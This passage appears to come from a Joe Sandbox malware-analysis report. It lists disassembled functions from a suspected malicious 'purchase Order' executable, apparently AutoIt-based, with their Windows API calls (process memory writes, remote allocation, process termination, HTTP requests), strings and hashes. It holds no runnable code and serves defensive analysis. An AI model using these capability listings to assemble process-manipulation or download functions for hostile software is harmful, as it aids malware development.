                                                        • Opcode Fuzzy Hash: 4d8b92cd561d32d3d7c3e0e77f36aefebed705fc3f91d4f2370fdeebcfa911e1
                                                        • Instruction Fuzzy Hash: DB01A432202211ABD7192B94EC88FFF7769FF89706B08043AF503924A0DB749D01EB54
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C87C07
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C87C1D
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00C87C2C
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C87C3B
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C87C45
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C87C4C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 5a3807199a58924ed7c8b8f787acd4382aa6e94a05473cc702c352fcea6a720e
                                                        • Instruction ID: 1bdf352928bc3aa46c71e5bffc084bf49a93a0cfe34072c0c71a82f139fe4502
                                                        • Opcode Fuzzy Hash: 5a3807199a58924ed7c8b8f787acd4382aa6e94a05473cc702c352fcea6a720e
                                                        • Instruction Fuzzy Hash: B3F03A72241158BBE7215B52DC0EFEFBF7CEFC6B15F040068FA0291161E7A05A42C6B5
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00C89A33
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00CB5DEE,?,?,?,?,?,00C4ED63), ref: 00C89A44
                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00CB5DEE,?,?,?,?,?,00C4ED63), ref: 00C89A51
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00CB5DEE,?,?,?,?,?,00C4ED63), ref: 00C89A5E
                                                          • Part of subcall function 00C893D1: CloseHandle.KERNEL32(?,?,00C89A6B,?,?,?,00CB5DEE,?,?,?,?,?,00C4ED63), ref: 00C893DB
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C89A71
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00CB5DEE,?,?,?,?,?,00C4ED63), ref: 00C89A78
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: b5079040cb2dff5d661a0e4b39255d8cd2cc33aa3463f4bdae20a239404cd62d
                                                        • Instruction ID: 2b5a7cdbec7b6614b061603bc147e28184640836fab3e1ce9e7054a49233799a
                                                        • Opcode Fuzzy Hash: b5079040cb2dff5d661a0e4b39255d8cd2cc33aa3463f4bdae20a239404cd62d
                                                        • Instruction Fuzzy Hash: 80F05E72141211ABD7152BA4EC89FEE7739FF85302B180436F503914B0DB759D01EB50
                                                        APIs
                                                          • Part of subcall function 00C5F4EA: std::exception::exception.LIBCMT ref: 00C5F51E
                                                          • Part of subcall function 00C5F4EA: __CxxThrowException@8.LIBCMT ref: 00C5F533
                                                        • __swprintf.LIBCMT ref: 00C41EA6
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C41D49
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 2125237772-557222456
                                                        • Opcode ID: 208a7336920e122420749b5b6fe99d88ac99c63f24dc79d99fb266ea925413d7
                                                        • Instruction ID: 48985ca0bd901860e5e4c3f5aaf483065552241c4ca8318573fe557611853809
                                                        • Opcode Fuzzy Hash: 208a7336920e122420749b5b6fe99d88ac99c63f24dc79d99fb266ea925413d7
                                                        • Instruction Fuzzy Hash: 1E916C755042019FC724EF24C896CAEB7E4FF85700F04492DF996972A1DB30EE49EB92
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00C9B006
                                                        • CharUpperBuffW.USER32(?,?), ref: 00C9B115
                                                        • VariantClear.OLEAUT32(?), ref: 00C9B298
                                                          • Part of subcall function 00C89DC5: VariantInit.OLEAUT32(00000000), ref: 00C89E05
                                                          • Part of subcall function 00C89DC5: VariantCopy.OLEAUT32(?,?), ref: 00C89E0E
                                                          • Part of subcall function 00C89DC5: VariantClear.OLEAUT32(?), ref: 00C89E1A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: 710c9c7a7f8cb55e623d8177cfc613f611266f35bb46121a85da247839cbbc8d
                                                        • Instruction ID: fcfb921669c4d8f3bb955a5fdaf1fe688a9cd2964c60779d63e98cb3db7dfe60
                                                        • Opcode Fuzzy Hash: 710c9c7a7f8cb55e623d8177cfc613f611266f35bb46121a85da247839cbbc8d
                                                        • Instruction Fuzzy Hash: 29915970608301AFCB10DF24D58995ABBE4FF89704F04886EF89A9B362DB31ED45DB52
                                                        APIs
                                                          • Part of subcall function 00C5C6F4: _wcscpy.LIBCMT ref: 00C5C717
                                                        • _memset.LIBCMT ref: 00C85438
                                                        • GetMenuItemInfoW.USER32(?), ref: 00C85467
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C85513
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C8553D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: be625947b58d5afdae88c92c85141d84ff9a2335e125ca64015f8a4b8bd7bd27
                                                        • Instruction ID: cb810d03b0c3a618168fae1dddacf6a287716c90da00bb2e6b1bc9879e2fe109
                                                        • Opcode Fuzzy Hash: be625947b58d5afdae88c92c85141d84ff9a2335e125ca64015f8a4b8bd7bd27
                                                        • Instruction Fuzzy Hash: 2C5104716047019BD715AB28C88176BBBE8EF85358F14062DF8A5D31E1DBF0CE44D75A
                                                        APIs
                                                        • GetWindowRect.USER32(015E7710,?), ref: 00CAC544
                                                        • ScreenToClient.USER32(?,00000002), ref: 00CAC574
                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00CAC5DA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID: @U=u
                                                        • API String ID: 3880355969-2594219639
                                                        • Opcode ID: 5ba8382cb0cdb50bbc37e693039d8d3e927e7c1bca4df96b10d70a2f040848ec
                                                        • Instruction ID: f8adce9d836559c26b60d53aff3774fdccf7cb41ea6258f359db83a707f2a243
                                                        • Opcode Fuzzy Hash: 5ba8382cb0cdb50bbc37e693039d8d3e927e7c1bca4df96b10d70a2f040848ec
                                                        • Instruction Fuzzy Hash: 33513E7590020AEFCF10DF68C8C0AAE7BB5FB56328F508659F9659B290D770EE41DB90
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C7C462
                                                        • __itow.LIBCMT ref: 00C7C49C
                                                          • Part of subcall function 00C7C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C7C753
                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C7C505
                                                        • __itow.LIBCMT ref: 00C7C55A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID: @U=u
                                                        • API String ID: 3379773720-2594219639
                                                        • Opcode ID: 044cdbbecdc74936b7ddd04b2e4cf82198c058924bd673630b0ec56816ab9e6a
                                                        • Instruction ID: 98df33b6253d5a24a0536d94dc0a6bd49be4f605dd03627d482f8325ad358e13
                                                        • Opcode Fuzzy Hash: 044cdbbecdc74936b7ddd04b2e4cf82198c058924bd673630b0ec56816ab9e6a
                                                        • Instruction Fuzzy Hash: 8841A771600209AFDF21DF54C891FFE7BB9AF49740F004019FA19A7192DB719A45DB91
                                                        APIs
                                                          • Part of subcall function 00C8430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C7BC08,?,?,00000034,00000800,?,00000034), ref: 00C84335
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C7C1D3
                                                          • Part of subcall function 00C842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C7BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00C84300
                                                          • Part of subcall function 00C8422F: GetWindowThreadProcessId.USER32(?,?), ref: 00C8425A
                                                          • Part of subcall function 00C8422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C7BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00C8426A
                                                          • Part of subcall function 00C8422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C7BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00C84280
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C7C240
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C7C28D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @$@U=u
                                                        • API String ID: 4150878124-826235744
                                                        • Opcode ID: 58dd17e5446ee8cd8decd033d84ce2e3caf8b3145be7df6bd8385cbeb7ccecc6
                                                        • Instruction ID: 5d16a80ec95345acd473e64178e82a4f2cd60dae46b7a77675e7316cabee5454
                                                        • Opcode Fuzzy Hash: 58dd17e5446ee8cd8decd033d84ce2e3caf8b3145be7df6bd8385cbeb7ccecc6
                                                        • Instruction Fuzzy Hash: A8414872900219AFDB10EFA4CC81BEEB7B8AB09300F008099FA55B7191DA71AE45DB61
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C8027B
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C802B1
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C802C2
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C80344
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: d0b008ef5677d7424d91c8961a8bb4935e82617cda80a0f4893f378d7d329089
                                                        • Instruction ID: 8d0270afeb68730db48643487dd63d5ae86d154b8ae63217af6b91da8ec2bd76
                                                        • Opcode Fuzzy Hash: d0b008ef5677d7424d91c8961a8bb4935e82617cda80a0f4893f378d7d329089
                                                        • Instruction Fuzzy Hash: A3415FB1600204EFDB45DF54C885BAE7BB9EF44318F2480ADE909DF256D7B1DA48CBA4
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C85075
                                                        • GetMenuItemInfoW.USER32 ref: 00C85091
                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00C850D7
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D01708,00000000), ref: 00C85120
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 6ece51bbb5831c022e08ead4fd5c3543c48a517f7550f38e12f2e3a5bf3857ba
                                                        • Instruction ID: 45bfe3e9314a87b58051a18cda6e8627e08cc1b382a11d0bc4cbe78e3194a9f5
                                                        • Opcode Fuzzy Hash: 6ece51bbb5831c022e08ead4fd5c3543c48a517f7550f38e12f2e3a5bf3857ba
                                                        • Instruction Fuzzy Hash: 3441E5702047019FD720EF24D885F6FBBE5AF85318F144A5EF86697291D7B0E904CB6A
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CAB5D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID: @U=u
                                                        • API String ID: 634782764-2594219639
                                                        • Opcode ID: 2fe318ee0bfecc0945ab0319e7f4926b08f2db4f31e80cc536ca44c4e9871650
                                                        • Instruction ID: 4af916cd86d8a2664de0b64ae4bbad25899f8b56503279e0ddf08c8766cc5f3f
                                                        • Opcode Fuzzy Hash: 2fe318ee0bfecc0945ab0319e7f4926b08f2db4f31e80cc536ca44c4e9871650
                                                        • Instruction Fuzzy Hash: 3331D074A00206AFEB288F19CC85FEC7764AB07358F544511FA66D62E3C730AE909B51
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00CA0587
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 2358735015-567219261
                                                        • Opcode ID: 593759f4cbb79a8fee008f1c7f827717e591b1f9b39cd10e3db611471be7d976
                                                        • Instruction ID: 0592bcba1c1690ce468a839d81d2adf05810868a6fabb8098c9caed2c173f8d6
                                                        • Opcode Fuzzy Hash: 593759f4cbb79a8fee008f1c7f827717e591b1f9b39cd10e3db611471be7d976
                                                        • Instruction Fuzzy Hash: 6431927090021AAFCF04EF54C8419EEB3B4FF55358B108629F876A76D1DB71EA16CB80
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C94401
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C94427
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C94457
                                                        • InternetCloseHandle.WININET(00000000), ref: 00C9449E
                                                          • Part of subcall function 00C95052: GetLastError.KERNEL32(?,?,00C943CC,00000000,00000000,00000001), ref: 00C95067
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 1951874230-3916222277
                                                        • Opcode ID: 6becf1daea126f08690cce1c2e49ea50975cbbda30614d94017bf1d3540bdaf7
                                                        • Instruction ID: ab5a451c9e18be34dab8c7ab6e563c9177684bafec9dd199c81b6588e33846ce
                                                        • Opcode Fuzzy Hash: 6becf1daea126f08690cce1c2e49ea50975cbbda30614d94017bf1d3540bdaf7
                                                        • Instruction Fuzzy Hash: 8521A4B5500208BFEB159F55CC89FBFB6FCEB48B44F10802AF509E2140EA748E06A771
                                                        APIs
                                                          • Part of subcall function 00C5D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C5D1BA
                                                          • Part of subcall function 00C5D17C: GetStockObject.GDI32(00000011), ref: 00C5D1CE
                                                          • Part of subcall function 00C5D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C5D1D8
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CA915C
                                                        • LoadLibraryW.KERNEL32(?), ref: 00CA9163
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CA9178
                                                        • DestroyWindow.USER32(?), ref: 00CA9180
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: 772cb88ca9ed6c8242dbfc797c006a2444c53e4fec122cef162f4616ec74be0e
                                                        • Instruction ID: 2603adb539b39b865077678331c6715d256381b26611b5e64158007dcd0e3349
                                                        • Opcode Fuzzy Hash: 772cb88ca9ed6c8242dbfc797c006a2444c53e4fec122cef162f4616ec74be0e
                                                        • Instruction Fuzzy Hash: 00215071200207BBEF104E64DC8AFFF77A9EB5A368F104618FA6596190C771DD51A760
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00C89588
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C895B9
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00C895CB
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C89605
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: c74ca1030f74c24619011d80281a54b228c40a72dd574d212c6d1e155b28ee40
                                                        • Instruction ID: 096721c160e0d32f5a490578aefe90fa3ff75aa4c4ee322ee7abbb304f61f141
                                                        • Opcode Fuzzy Hash: c74ca1030f74c24619011d80281a54b228c40a72dd574d212c6d1e155b28ee40
                                                        • Instruction Fuzzy Hash: 0B214F70600205ABDB21AF65DC05FAE77A4EF85728F244A29F9A1D72E0D770EA40DB14
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00C89653
